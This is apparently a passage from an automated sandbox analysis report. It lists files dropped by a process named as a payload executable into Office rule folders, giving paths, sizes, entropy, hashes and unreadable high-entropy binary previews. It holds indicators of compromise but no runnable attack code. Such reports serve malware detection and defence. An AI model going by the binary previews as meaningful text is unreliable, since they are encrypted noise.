                                                                                                      Entropy (8bit):7.95988921084746
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:9421eOzGloZCWVhjEDzTdXtCTEamC1Q6zVmwI24EIu9ROBB4S:942cOzGWZThuzhXQTA+lmHEI74S
                                                                                                      MD5:7553C617FCC34156C36075548C9D8D38
                                                                                                      SHA1:7FCC207AECB305AB9610445C2ED413B710027F20
                                                                                                      SHA-256:7F06AE358EBCC35CE125DD68E83EB3C85E93076CF2DDE572272799B2B8079AC1
                                                                                                      SHA-512:A3FB614007DB451593844ED85CD9B837EAA7AE1845A6DC11477EA25DE09D0C31AEFF513D99D1EE2377161135478D0C5850E9CFA4AB53FEEE764719CD0F20FF03
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..VH.Vu7.Y...].s..o....;.cM......._..g,e!...q..`\.f.:H..^..~...<Ct...f....{A...P....?.E.H.\.*..+...(&.....TL...V2.%....=hG.5..XKH...B...jJ.....s......j... ..i.D.....k.aWh...>p\.L.F.a4.X...>...GY.6..f>SZY....2.........z.8.b@....x.w....5.H...>..kn=.O\d.P..V.s.9hg...f.I..pF.$T...Gc2U:..".J.Q]eZ.|.G.@T...z.....q..z.........en..[..... .}..r.G.H...t8.Z.!.E<P.....8b,.^..?....H.......O7b.#.../...6.u..}.3.\.@9..<..d*|......).O2.z%y..Z..i$....1..w..!..R9&..x...S.I..I...P..iG.T.....m$4.R..).gL...~.c...Mr...i.....P@ P......S#..?o....P..c.0.........nI..... uQ.'Y1....I.c%.}..Q...I..m.Z.H.TQ-:k.~.Npp.q ..2/$.......D..F........5...".W.t.h?A..;..mB.?0aO...... bW...^#......%..),..F|X....o....W..T%SZ....>.T.^^.<B|.5..?z&.\! ....'R..v.n..qqh....fvPC.[......Y...Q...V..X(&.c...V....|....u...q.........A...q..4....f.^h...'9.I3_.(~.e....X.!Q(.|f.|_.;.......1..W..f`..y.s.........=.f.j.x...|F.:W..'.w.v...g.H.(..e....Xu.>".W.....I..i...{_.EP.`.Sb.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule12035v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2801
                                                                                                      Entropy (8bit):7.935474336619388
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:6PZbmYtmSVDlZ7cX6rj7j8jhnMyfZgMBux3VkrHGwqpBGsWpBUDP7saR7Y7SEq7H:6ha3yjjwn8rw8wsLDsCUSH
                                                                                                      MD5:7BBDEB264D4DE6E21E6148092D566F30
                                                                                                      SHA1:A5BA9AD2D4C9DB3AD0D7A3B82D587DDBCBA447BA
                                                                                                      SHA-256:C817190A0E0B520B4DCAC413AA1A432F76BC1236EFA914E7AAFB2556299A4B1D
                                                                                                      SHA-512:10C4CBC49AC57C36306C1E55A4BC81E99E2DCEF0311520755C30EF99F6A6C9AD3D8A630986144FB73CA0EB0B28D1BFD31D8E649469A03C49F0B6F424B876C6C1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..J."... ....e..!uWY#.Y ;.(z0..r.3!?.Z*....F.j;......-....Y.'...Z...~a%..b...FI....^...w.miw.k....S..C..~E..YKt..!.l.u....l..[.{......"K~s....G...m..$6t<A...\...C.b.3g=5....._..Z`}.rO...g/.K.9w.ot..&%c...3...9.....%..8S....z....3..o~..)..+s...vy.J..,.....U...5z.@t.e.f..^R.PD.6\..3.........=..........0.x....<..+'j.o.....J..79..........N......&....Hq._u..|..<.^._.r..~....m5B.\...dC............r.K..\.......PtOxVW.........2...i..dD..p.8n....xd.*n..6&...{...~.!lr8....09....&h.x...0......|......R..d.^PXF..~ntOJ.#h.....Y.....2..4t..O!}.(. .=.a....}.v.I.?......X'.e..&N..dA-.l.t.....I........'e..jn=..49..._.....}5..Z.#|H.\..(uDz.......A...D......v}e..O6?.W...+...W...>..:...QW>B.Z7.........^..?.:dH2f...@........."F..;.Y......@..;A.~..SF~.E..z..Xq.[.NSf=.\N.wi) .HL......s..-...|....p.L..KFq.=D..Z.s..]...<[.z.n.x......K.0.v....l..@....L.er.yY.qFo..........n.2.9e%.#..l/..'7.8E-...Ok.......z.ZJ.6...[..n...Y.m}Dp..f....?`..z.C...~-.....^...r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120402v21.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4122
                                                                                                      Entropy (8bit):7.958265976389724
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:3baeXYIZGTbPSYyMP+0DQ2AzJfBhDk0qcwuOj5C1HKVy:3elPl/cdBw5uK5eHKQ
                                                                                                      MD5:F17263B71485B13EF958A679F46706D5
                                                                                                      SHA1:3C6BF34CE2993E92959F801087803BC9013CBC9B
                                                                                                      SHA-256:A725F2E89D1B340F00FB34B7C76088974F96E5AFE88ADB0290AB9533DB1B9C1D
                                                                                                      SHA-512:9860F60BDA7B11EB478D9AFE0A38C93F97E297A2522E40DBC7F3AF5549C4358439153A8B85EA8E9682C2A8EF41D2214F680EA4DC2CF12E5DABA2FB897BD15147
                                                                                                      Malicious:false
                                                                                                      Preview:.<?7..p.|..tm....X@I...aSLr..bD..W.R.L...j.......G.O(E...|.qae.*.....JF.....O2.>...#.q.d....@..X.$.V..(..6....4...w.}.....P.b.....^nS.&2..w`.t,.uZV.JDg.s5..E...Q..Q.&.*... p..^.}.rn&...?.WqN....Wge....4q..bFq.[c.q.-..m2~..B.a....i.z..Ni.K.E.^FN..*...2.d.ah....IW..*.....s.....).+>....8..(ho.t..._.../....i,.q........Q..|V.&o~./&...CM.c..=..f....F.sR...tg.=..M_..Vi....,.......Ic.S.oIx...[.x.p+..h..I.`.x.1 .Y-...Xs.`.......q6...Y<.|.2..O.,.S..N...z)[L.8>.RP.W.....D...y%l.z....W..y.<nQ.N.M...s.O......N....\p.Q...N.Xz...TQ....I.X...#...@c.o...X.M....8......E((q...)....Y.N?.Lk\.$..B....?2..p.u..;..XgB..W...!........e~. ...{n3m.<.1f*..pFH...LO}..z...".....G..|:a|...7..$..O......u...EU.....'....c..`...'.*..($....<.n.YF..d..1..K..H...........WX..'N........S.^..L....:..N8./.C.!.7j.H...I...(..(Uzw...'..#e[..L+E..q...+z...0.C.n.......!XP..f4Y..KKv.......E=....+9>.i.....5D...b.......,...BqX.......M3..C.....x.Y,..t..J...Q. ....K...\..3..3........6...f

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120600v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3314
                                                                                                      Entropy (8bit):7.93783468151965
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:GlvIhgju00lNwRKB5WkM+5xsc+2qD1P5Ts+PZcQN:evIhCVmgsYJ+UV2qD1Ns+P+K
                                                                                                      MD5:1F146C2CD895D79B7A21D2699AA913F7
                                                                                                      SHA1:118A1EE1584935266BAA0DFF7B2FD039789404C2
                                                                                                      SHA-256:296F25DEE9823726FEB54C7F6DD72DEC5CB638B759C0064B2BA9B3DC3BE5B1F0
                                                                                                      SHA-512:76B4E12F524A41094D499361F0A4C4391195F6836CF6F585BCABCD92CCC6DDED5D14510BF010E0359B34F54A42F206115FA8EFE6CD12B742FADB17CF6C954633
                                                                                                      Malicious:false
                                                                                                      Preview:.<?M.8..!....)........lD.L....VId...U#.Z.k..?...J.g.>....a...C......E.C.[.F..y...U......o.#jg.%hN.......Ux;.7V...9.....na..1.{.F...S.JQ.b...#.....A.F...E..E.<D.k.C.........:|..i.rr.e:_.(1.eb..K.j..z.......7...<.........y.(...$..&..~..&6.t..............T..\<0...-3...X..%.L1...i.?..Q.....p.....c.d......../..U.M..YGN.....kw.p..9..`.~uK]YtU..L.....MJ nK.WW.....]j9d.q<.&.H2..Tu..bVRGK...I..1.......`..6!v.&nIFI...]:Sy.6..'.m..P..K34.<`$wK.6.?X2 HfG........&.)O....S}.....smW...".B....z./w..1..$...q.d...>z/....e.>.j...)...)N]Qu~L..\..*.c.....~....>.....|#.. "..drj...q.<....C.....,....H.HG..#.J..c.{.<...+s...'=.I..1.tv$......|........O.#...OT..Y.~.X.c8Uj17I...4S{zo..H*K...Z<..#z.-a.......a9...EsY...QW..,.=.x8.,7...N...Z1......9qdU...T..V..@.\=.l.*.n.Sa..D.1]..2]..4...}..z.:S......5.Q....c...K......[...4...N....5...#......n.d....T*...-q...F\K.a..^.o..........!jHm.(...X"..D+..9...>.p.CP..}P ........J..,1.y.0..sE..P..R4- .|,[..|..T'.S..........X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120601v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3676
                                                                                                      Entropy (8bit):7.945538883303366
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:Xb+eE5m0glX8abggQcaQkxH2+O5InhpJrbYZ:6eK1CtaQkxC50vbk
                                                                                                      MD5:0118E112F03262E57ADAE45343DD205F
                                                                                                      SHA1:01A79B707017499422B693F3D27938B374E7536F
                                                                                                      SHA-256:A07780D116624840694142862E4B416617CA335A3FBE9C756E79D3F19169C23D
                                                                                                      SHA-512:6ED2B7176342D625CF747ED12118E70D4740DA3FA11A41336AFD8D09F4647BCFBD9916D110744B76991D0589858D2CB45D01D53FA82F5691B5E7D075254FC809
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.d].-?...l.-.,;i........x....^.+.A.*{.@CeQ...H.y.....r-.0....v..@.n.(..</..!.\1..;.m.U...O..aM.W.......Z.8...al~..T.B.`g1B.dF.ILI..00.&...!D.j.w......_"N...#I..=&8. .........w..-....N......g.6....i.`.>.a..:....n...]Z;X7q.#...|...b...{=.[.../.`.x.P.......v.......[JO.f+.g.;..X.......T....x0.$..=p...lrU$.....78...\q$8$L...M..s.C...R..I.E.d^F..........|.n|...8.....@/.O.V..P!......mAR.1........g.P..?.g..Ach&S..>.QP.+...G...B.]..&[~.Q..eHl#S.Y...JM%....s.)....M...C...L......S..Ohl.t>......2)...%d........w...E.k.q1.....A_1q.Y..a-....!..Z.+.M.&3.g....o]...S.|Z...(M7p.#.t~.....~h;.HcrU;....!I.....#.........'.B....p....IK.IZ...r...X.~'..vut..gK...e&..~.,....M.......p...r....Z....X....S'....J..r..H.+C....s....b....=.uy..c...M..z....\N.u|*6I.........F..-...I.u..Z.i5..m..7.f..U\....}......_.=...Ju....0I.........P.s.W6....=$...D.........]g$..w..Z....X...`.EK..i*b..8.. l..(hy.%.x.X8.G......o......&.."...J.....3s9..O...R.*...<.........;..%\.t

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120602v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2925
                                                                                                      Entropy (8bit):7.938013314840167
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:J3qvN1Am2jiQRQdMPwB9yX9QYEQY18FmeApreyEpA+7QErgtLsxPjNnwD:J3qvP9Si84FvXDpa1g0q
                                                                                                      MD5:3425B0744B6C60ABE0E9698DFDA7A8AE
                                                                                                      SHA1:F6FAA75046F19A6CFFBF4B3E485F15BF53F5AB4A
                                                                                                      SHA-256:8B5878786D75C70CBB5B8077DF9B4626C6CB224C4363B7CD2709B14B17115463
                                                                                                      SHA-512:75FD68CE446F1D9283AE2E501A3224E509F1F43C7AE739DDE188C7B78D7A0EA318269F0B788D880E64F6896FC4AA413827CCF34C1733C13D54B6EE85CA2F30AB
                                                                                                      Malicious:false
                                                                                                      Preview:.<?g...kD..3....a?.=.a<..D....T....C.b...B..6........'...L.O..jh=.v..{..S'......&.$.....I....p.)..;$L..?.s.kl.q.......8....(.t*....PF.*.2.8?2+...>.....=.>R..3...U...v..K...!.=../...0..(W."....X7..I.../D..G.=..nL.Y._.....-..e..n.....BW..I. }."[$}".~..}.W............ .W. }...U.Y.o.+...j9..7.J...W6E.......o..v,s.i...g......."....E._].o....F..y..v..h...o.....+db/......m....\.i.K%..b...........5..t.S..|xIB...s.o@..x..9.hA.?.{...u.....Y.%.=..K.2...d1c..S.9R.N*...M.u....v...P...p ..oS...j..I]j.....V.....O..a@3Q.b.1.j....jwT.ro.{}o.x....Z.0......:......lt.M..Q&...@RH.a......d.H+.Ud>h...q....F.U..^!.'....;ap.H.T.L.....s...+.v..e>......(......qPC.a{......-..n.....|.*.u....y(......A.S.fWR'...N..,.........C....z.&.......pr......&......b.B......)k".iQ>.i*r....D.....x.#.J.....n.q.CwR.Hw.A....dB.B....3..........O8".'=0..f.m....i.A`.h.W.O.:}.).R.....G.#Q.j......M..(,...,..~.W}..'g..E.....f@G.=._6C9......5-...t9..............-...}. .

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120603v8.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2462
                                                                                                      Entropy (8bit):7.9181823939080305
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:V/ThXvulQpIK0CN1WQOLITm91/giVNaLW2isoisvLbTwD:V/TxmhCWbN7gOXmoisP4
                                                                                                      MD5:2063BEDF4953C7DCC15439470584EC5A
                                                                                                      SHA1:556063CC90E8526879C8B80297381CE6242C5E9A
                                                                                                      SHA-256:9729473B2A0A6D9FFA2E505B1EA9143F2C6EBC058EFEEB3D417E92BF22E3159C
                                                                                                      SHA-512:6D6749DD86F9B3D2B1009EA433A627BFD65FA6BB7AE6D15FA5B185B2CBE9F82D6A11BE77C7E0AA43871BC47335949AE1070DBD29CA863FFD74FC7908F851580A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?2.c...}.W.]..F.tF..v}.......1..C=.>...X.e.-`....j..65s.G......\.....3....[i...'.!..".9+0.?..U..,.S...k.:l.fD}9x.cE.<..C.]N..[......^.O.WQ.2b.32.....I..m.%...5.V....]o...B...s.&..T..2.....:.O-.#.....I..;...1R? +.Jf.'w..oDZ.F.m.'r..1B~..Kq."d.=..x.D^.~.x]...............xf3o2..Z...5k....+8...'...d"%_..pv..{.UY'.Q.fy!:.`......R'.}.QDj...w4...H........ .<.t.<.h...E.KM.3....l...P..].2{.}..B.o.o..p.t...........-1#.M..9.u.....f|..{..h9...U...F...O...(.u.......p.\.....e=[.`Y.BX..R.8.JKL...Uj4.-..rk ...l.(.35.;.T~o.'.B<......f.O%]..|.H...R.s+.T.......V...M.h.P.o........o...'tg..~...5..C.u.5..f.Nbe......{a.9.I..N...Q.I..7`.w|..&.F..S..Z...).'P....B.....r...U..... .....j.....<lq..I.tQ;....N.{.d!..9..S.].U..H'.z....K.v..K..Cn..j`..iKB...^.m..:....7.y:....Ugo.}i..P.........N,-q......:..,?I......?)pF.=......!..Mb.......O.....Hr.".!.z.;..F...I...n..].....`.."./....8...'GH...}..[.._*......-....._2...........%|............\.K!..R...F.]..2;[

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120607v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):538
                                                                                                      Entropy (8bit):7.439919862327193
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:VVghw1R37HZNt1hes7A+oqieTdg/2upn3v6cii9a:vghC7gsD6eTdlmv6bD
                                                                                                      MD5:018C4AB60F83BC1E8B2A831F8253472F
                                                                                                      SHA1:8A832DB1CC84F2181DC73CBFF0D6F0BE26C2D86F
                                                                                                      SHA-256:8D0B73B08A263AEB9F271C6D2710979D8496D7053831D7F59415FB0452F7ADC3
                                                                                                      SHA-512:0C25261E44C4C7B616EECDAE140229916D544ABBCEF6411F047785353432DAF2EF20D34B77EC18376E6B20C6E6B918E398906513C2AA44F76D3CF9BE26FD6752
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.8...Q6.+.TG.)O.a...D.<<y..2...H..p...o.'...5...\.C&..,.M.....9.9...n>.G<5......d k...?.H,.2..?.2{6.7.9L....;..e..}....Z..cp.{.U.2...9..h.0..T00..n.?..M9.b,&....A.mER....j......}.@..c.s+.....0.D.E.Nf.....V..}z2....<G...........TX5P8.M.Cc.q...hxEm.e}...O....w.r.Y..;.5W....\.ZV./....@2 ...r.z.C..Y.*{?C2m.!2.N..t...~.g..k...V2.Q...?$.%Q.S..A...O.b.....6....27.B..UkecQ.nY-..n..e..n.U..<+.E.-...5."...!..>...9m....9...?...U^...C..&L.{..D..r/..FhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120608v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2494
                                                                                                      Entropy (8bit):7.936830443079762
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:IawYmVfQ+F7vo99M9rGT9kn0wuLKpsEOeUEFwD:IemVn6Ma9cuLnEnm
                                                                                                      MD5:EB97ABED75F14502DE17B348D6F5FCF2
                                                                                                      SHA1:778B72BD25F17F9EA1433C932C03A94CA4DD5F6D
                                                                                                      SHA-256:69699DDC35D675676960F21B252749D796715E501CCB6729DE9EE81FB9066B48
                                                                                                      SHA-512:00E56161B39F9CAF8BC5705A8A320CEE014E0208B85B1CE9A1060FC64DCA37DE4FC0E00248781591B5ABFCA6FC154BBCF64E4C6F81FA5EF0C7B4409AAA19EA2C
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.)......_|..km.5..c.W0..."UH...1K.F..-M.Cjld..>...N....p..[ezG.LZ..Z.._....E..G...."...D(..l...I..!3..H..8sR..# ...9$..(...B.............H=...gCe.....Q.OX.L.FZ..^2..g..o{.X*.U.G..A.(0RH..s....v...o..#....mD.t..D.I....Q{A.9.\..+!9kD...6.C.s.......c....mFH.`..$..D,.E^#..{.)\...-3?.x_.O.x.#@.7..].x.j.$..1..}w.w..)0.y....,..-!...&.........EUfh......9b.....x2.N.?...U8J].O.o...9dDMo.t.+#..(........{P........]nls9.UF.4R@.=..."..'.Tv..a0.4...UG.u..Ha,....Y....F.t.......6..+...$V.X|.Qo..3.w.S4.5..Qx.U5...L...H...U...B14<.a.r:...../.....`D..s..OJ.b....EN{.....0.l..s..d..J....7.a..^..F........N\|...mM|U..@.h.k..v...P..9.A.f...p....R......n,...!.(.....z].&wv...w.|.?x.a}K_.....H[...%..H.......dl...'..r..z...uI.........[.HRCi..^..<<b....Pm...ip.ba|*.;..U3...gv....[.'. #.E......K?9......w3.>.S.1.P.Ms.....P..V[.twy..yW..I.....i.f....c.(.Wn.#TV....t.N....[.@...d...<K.]...&]S8u...m..W=.+-]...q..1\&.}c.)75...X$..../..}.....t$...\....Y...1..E...Q.a.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120609v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):742
                                                                                                      Entropy (8bit):7.6940101657748246
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tjC0+Tz1iy2B4M0UCEf3DfLnNP7Wt6bdbfSIQbtD1vpwzov6cii9a:oVI4MxCE/DzNP7SSbfSIyhbv6bD
                                                                                                      MD5:12AEDF47F67932B803CC8734B843D1BE
                                                                                                      SHA1:2507DF9FAB343E22CC01663CB19F2E89E13916B7
                                                                                                      SHA-256:F497EC47535CFAA865B19EB54DE70F59B6A3E3C87E0372CD72CA238C76BCA275
                                                                                                      SHA-512:43DE853F129348FBEE5FB24698CCC50FA04625F1DC42FAEE5B2D1E1CB203860FB30F4FA0378E704E0F38D8CB40FE98C544F54D4E5AD3C2F5DA2FE5C09C33E46A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..g{....J.z.......g..m..21GH".^.3..c..._b.{J..!.......+....n..@Kw....b.o..<.y[.wWQ3....7<.&...iP}h.......Q...H.A... ./.8c&.|+...,N./p.........?...F..q..Aw..S[z..U.....0..68....12.{.......@ .1../..o...c..L*<C..lZ{.97...zgs....ilI....e.6.a{....|....@.....,Z|.fQ..E.i:.."...))n.....~:z?...c.X(9......\).p...U^.....hrQ".l<.8C9R.]......'..T.%....[..v..#{..abO..b.p....G0....G...9.o3.m.T.!~...1B&L....h/..<.{.!......x...c*.BC"....LqhQ....... .*..oV.S.V.N.7..]..9...H.....E....W8.K......4[..0 ..C. u...>m.H...v.9).v...aV.I.....u." Lrx.rU...I...nAx.~A.....H...r(...u.C....k...D<.^..\c.C"9.l?..k.......T.P3r....e~..8....zb...K.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120610v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):808
                                                                                                      Entropy (8bit):7.719919578946542
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:f9PdOJncUnAMTzmyGXGMQfNy632wJxFmocXKNoQgv6bD:fN4q8AMIWMO9m+x8Xo4wD
                                                                                                      MD5:8B8D099D2CC9B979DA4D71A204263FB4
                                                                                                      SHA1:DB209F3CC3659750C3F4EC3A754D54CC653EC1DC
                                                                                                      SHA-256:214D5F6E473AD9DB182586A0B7B4024CA2091A3A7D3A3A0EB0D96341891E9055
                                                                                                      SHA-512:E38BEDD64E0AD9BCEE143D9388466A81D4353D5779B05ECE84B6570BE42DCBA94632BE8E77242A8F3B0496037170F80ED987D833F5918A116C179964EC6A5177
                                                                                                      Malicious:false
                                                                                                      Preview:.<?x...a......Q..'.>?.f.....D....?v.e..tS......n...o.].x..P..".......l.sr...m.^.X.9.U.t0\.u.z.V.G!T.rD....KU..L!8.......[f_..>.....1....+.g. ..SLb.......z...r.-.6.V......lK:..I;{~.A0...v.b...G..e}.L.lyy.u..i...x.k|..?...m.........ISF...-f.zTs..0.N.B.3.........%'?Z..!.......*g.h........Q..I\.R..........s.Z2*......@......3.uu...t3...K.k~..)..!..#mm....+..V...Q.$I...L.2...!.8.hkR.C.....5..../.l.\F...-.4...J$,.Z......4...Ol7....o.0=.....z...Rj..O...Y.2.0.J...q..<1.._k.m.@0.^..L.......A. .._s..UP.v.].S....../..iy..-L.Cd..U.......h9Q..1.U*......uO..9<...=m..`..N.<.&:" .R.....Sp.2.@;"...j..o....d....d=......{..;^..$(u..=s"..1..8. .'._...D..gHv7m..G...dz2.&c..k..5...u.l.byyV...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120611v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):749
                                                                                                      Entropy (8bit):7.691261781013283
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:UrCU/ad8poe3Bq33Z06Xe3dEL4tiLiZ8iGd9j012ftnPjpzYug5SInSoOAeDU8vk:MPae3BJfdE0tiLiKf0AtnV0SInSoO9wF
                                                                                                      MD5:F8647129F453E96ED2566DB2B7B4725B
                                                                                                      SHA1:0C5D79ABFEAE9029FDB4CA5782980762E3E284A0
                                                                                                      SHA-256:CAC5DEBF7EF022472EC18BE994BBF4D0E49DC9CFA8246C1A5683FB8D2D474E7E
                                                                                                      SHA-512:59A43106904A84FA4726730B15A1FE7721661E9E5185B1F364EF885FD7E3458207F278ADDC3479AEE42080C22D1F623F83156C427403673D754A47D1F92A01D5
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...d.}...M.7....N.....{9qhzBk....ZA...>.D.=.,....wy[....!.M*.....3..B.Xc...v.nU....=H.L,.U...{...G..K........^.P...Y.)..F.........&.........|.V...RM.1K.9D.fk......9.)..bl.!.:...y..C)...kY}..{..V..m.T...Y3Q".f9.^.b..eZY...`.........q.Z5...58.....B.HV.B.....(J.y^^....^.$.4`....Cy-x.?b.]../.>aQ.q........YS.m."....M.P(5....^....\,FJ[.{t..-!.u.] *J...W.X.~.AY5.i>b.1.+.u(...=....:t1....J..`B.N....8.F.p.U.nrl].]B...._....4>.....=.;.p".....m..;....?.15U..^R5:.(.....{.k/Lt...........L......n..E=....t.A...w...\.5.I....?M+F...............2.Q.l{....B.......p...2Q..4..Aw....G.k....A.........c...%.#mq...<+l...Z..o.$.J..T.....Z....<...t.G....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120612v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):805
                                                                                                      Entropy (8bit):7.733876115113795
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2j7ytahTKDPTmxjd3Kt6yYwzj9L5LmCoi70oQYnv6bD:01sTyc4wX9L5ki71nwD
                                                                                                      MD5:19C1501FF6FC212FDF65C30C9A8D88B0
                                                                                                      SHA1:DA2608F9B42984CB77D4FFA49B3A6AD451F37CD5
                                                                                                      SHA-256:B24EACF3FB8B1ED4568E10C49258CAF327902850751577F7FEE99E8D4729BFC7
                                                                                                      SHA-512:4F721B253D4083121985B7F20D01379B08AB3BB07997D8D15877CFE523E085F8B10E01562945C85F28FA65D041015D200EFECEE8F1C5C32E8BBDB76B3789381F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.........t...~..;h.$.^]...O.).o.z.f.S".>ft~...r..Rm. .,wF[b....&.".p..v.B.B.l._Q.Q..[..E/c~d...{..e[L>........8...5..G..B.O-.I..z:.1C.q.0;.w./..t.Ro.b.o...}..3-.(.s.t.#w5.,.pm*..5..y.#.&1...1........|%b:p..7U.pEl*Id.Z....^...<q..S.v,f:j..Y.....&.@0/....y.[.A..]3+.... ..;....C.....\.c.....J....L.;{....+......Q.....zLk.....0..qtp.....1'S..r._A....S....q..a.k.5'(.7/T..w..cF...L...4;.a*..:Pu.80E..}.h+..o....J....n]|F.`...*?.j4.......;v.\K..4Q..@.....pt.&..;.......{d..R.Rfe..P%q....@*'3....C].n.*.. ....iV...........:...\Q4,.r...2x............2@8....$*....1....?a&..>...4...w.......n...[e........U..dF....l....A_..]...W.b.U.y...i1y.,.f.e....s.'...;I..Xq...f.........c.c.N~...v...'..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120613v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):966
                                                                                                      Entropy (8bit):7.803183761225974
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hyNSl//eDbWWs/Zy6c2rD72q5jX6QD86aM/znv6bD:hyi/mDa5jXw6aMrnwD
                                                                                                      MD5:9FC8B9606BD235E41B6E32E198BDEA46
                                                                                                      SHA1:D0938C2F055C3D278CD760440EDA7BBFDB4E170B
                                                                                                      SHA-256:E92FD21D32E1033536CD87600D97353F6CC8D96A08735239B59DAC9AFE3AD2BC
                                                                                                      SHA-512:B268837492E76A799731E7667E7D150B1F738ECE0F36FF31B18998EC594A6A0895B5E47CC11918AEABBA545FD1CFEABB0135EBB62141E7900C755EBA96731BF4
                                                                                                      Malicious:false
